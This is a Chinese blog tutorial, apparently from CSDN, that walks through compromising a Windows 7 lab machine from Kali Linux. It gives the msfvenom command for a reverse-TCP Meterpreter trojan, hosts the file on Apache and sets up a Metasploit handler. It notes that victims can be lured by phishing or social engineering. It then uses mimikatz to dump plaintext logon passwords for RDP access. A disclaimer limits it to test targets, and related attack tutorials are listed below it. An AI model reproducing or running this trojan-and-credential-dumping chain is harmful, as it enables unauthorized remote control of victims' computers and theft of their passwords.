使用kali中的msf渗透windows系统:

最新推荐文章于 2024-05-17 13:45:39 发布
最新推荐文章于 2024-05-17 13:45:39 发布
阅读量505 收藏 9
点赞数 7
分类专栏: web安全 # MSF漏洞利用 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/135362723
版权
本文详细介绍了如何在KaliLinux环境中利用msfvenom生成木马、通过Apache服务传播、利用Meterpreter获取目标系统信息,并展示了如何使用mimikatz获取密码以实现远程登录。注意,所有操作仅为靶机测试,禁止在实际环境中滥用。
摘要由CSDN通过智能技术生成

环境准备:

kali:192.168.13.128
win7:192.168.13.136

1、使用msfvenom生成名为cmd的木马文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.13.128 lport=5555 -f exe > /var/www/html/cmd.exe

其中lhost=攻击机ip、lport=监听端口、-f 后门文件类型、>/后门文件保存路径

请添加图片描述

2、在/var/www/html目录下开启apache服务,并检查是否成功开启:
/etc/init.d/apache2 start

/etc/init.d/apache2 status

(出现active running表示成功开启)

请添加图片描述

3、在靶机上访问攻击机IP,可以看到生成的木马文件,下载到本地:

(此步骤想说明的是,攻击者可通过钓鱼网站、邮件或者社会工程学等方式诱导受害人下载木马文件等)

请添加图片描述

4、开启postgresql服务,并检查服务是否开启:

请添加图片描述

5、开启msfconsole,设置攻击模块如下:
use exploit/multi/handler

set lhost 攻击者IP

set lport 监听端口

set payload windows/meterpreter/reverse_tcp

show options

run

请添加图片描述请添加图片描述

运行之后,然后就等待靶机中招了

请添加图片描述

当靶机运行该木马文件(cmd.exe)后,攻击机直接获取到meterpreter:

请添加图片描述

6、进入命令行shell,出现乱码输入chcp 65001即可解决,然后我们就可以查看到靶机相关信息

请添加图片描述

这里给大家提供一些meterpreter常用命令:

请添加图片描述

7、当前期在信息收集时得知开放3389端口,并且我们已经拿到meterpreter后,我们可以使用mimikatz工具获取明文密码:

链接:百度网盘:mimikatz.exe
提取码:428y

上传mimikatz.exe到C:下

在这里插入图片描述

提升至管理员权限 privilege::debug

在这里插入图片描述

读取铭文用户名和密码 sekurlsa::logonpasswords

在这里插入图片描述

接下来就可以进行远程连接 rdesktop 靶机IP,登录到靶机进行下一步的操作了

请添加图片描述

注:此博客仅用于靶机测试,切勿对他人电脑进行测试!!!

Mamba-
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4486
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3566
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
Kali渗透Windows服务器
最新发布
程序员阿飘 的博客
05-17 756
如果你也想学习:黑客&网络安全的零基础攻防教程本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 2416
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 3529
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
kali系统入侵电脑windows(win11系统渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 5210
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
kali使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF的shell.pdf
12-02
在本课程,我们有两个服务器场景:p9_kali-7(运行Kali Linux)作为渗透机,和p9_ws08-8(运行Windows 2008 Server)作为靶机。确保两台机器的网络连通性是第一步,可以通过ifconfig(在Linux上)和ipconfig(在...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
渗透测试MSF可以帮助测试者快速定位目标系统的脆弱点并进行攻击。 2. **Web传递攻击**:在这种攻击模式下,攻击者利用Web应用程序的漏洞,将恶意代码注入到页面,当受害者访问这些页面时,恶意代码会在他们...
E023-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
在本课程,重点介绍了如何使用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。Armitage是一个图形化的界面,使得复杂的MSF变得更加直观和易于操作。 首先,你需要启动实验环境,这包括两台...
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
msf5 自动攻击模块 db_autopwn
07-10
`db_autopwn`是Metasploit Framework(msf5)的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程扮演着重要角色,因为它能够快速扫描并尝试攻击目标...
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7418
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
如何使用kali来入侵(渗透)一台windows
qq_53058639的博客
03-15 741
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali linux渗透win11操作系统
2301_78519654的博客
12-27 670
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=8888 -f exe -o win10.exe。第7步设置IP和端口号{端口号用你刚刚生成文件的那个端口号} {IP用你刚用ifconfig这个命令查出来的}我的是172.19.215.206。第3步在左边的终端输入以下命令并回车。第5步 在左边的输入一下命令并回车。第6步 在左边的输入一下命令并回车。第4步在左边的输入一下命令并回车。在右边的终端输入以下命令并回车。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4278
利用kalimsf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
利用kaliWindows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1848
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4385
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版,改成了用Ruby语言编写的了。在kali,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
Kali Linux作为一款强大的开源渗透测试工具,是学习者和专业渗透测试人员的必备资源,它提供了广泛的工具集和攻击模拟环境,以便进行系统评估、漏洞探测和道德黑客活动。 书内容涵盖了从基础配置到高级技术的全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值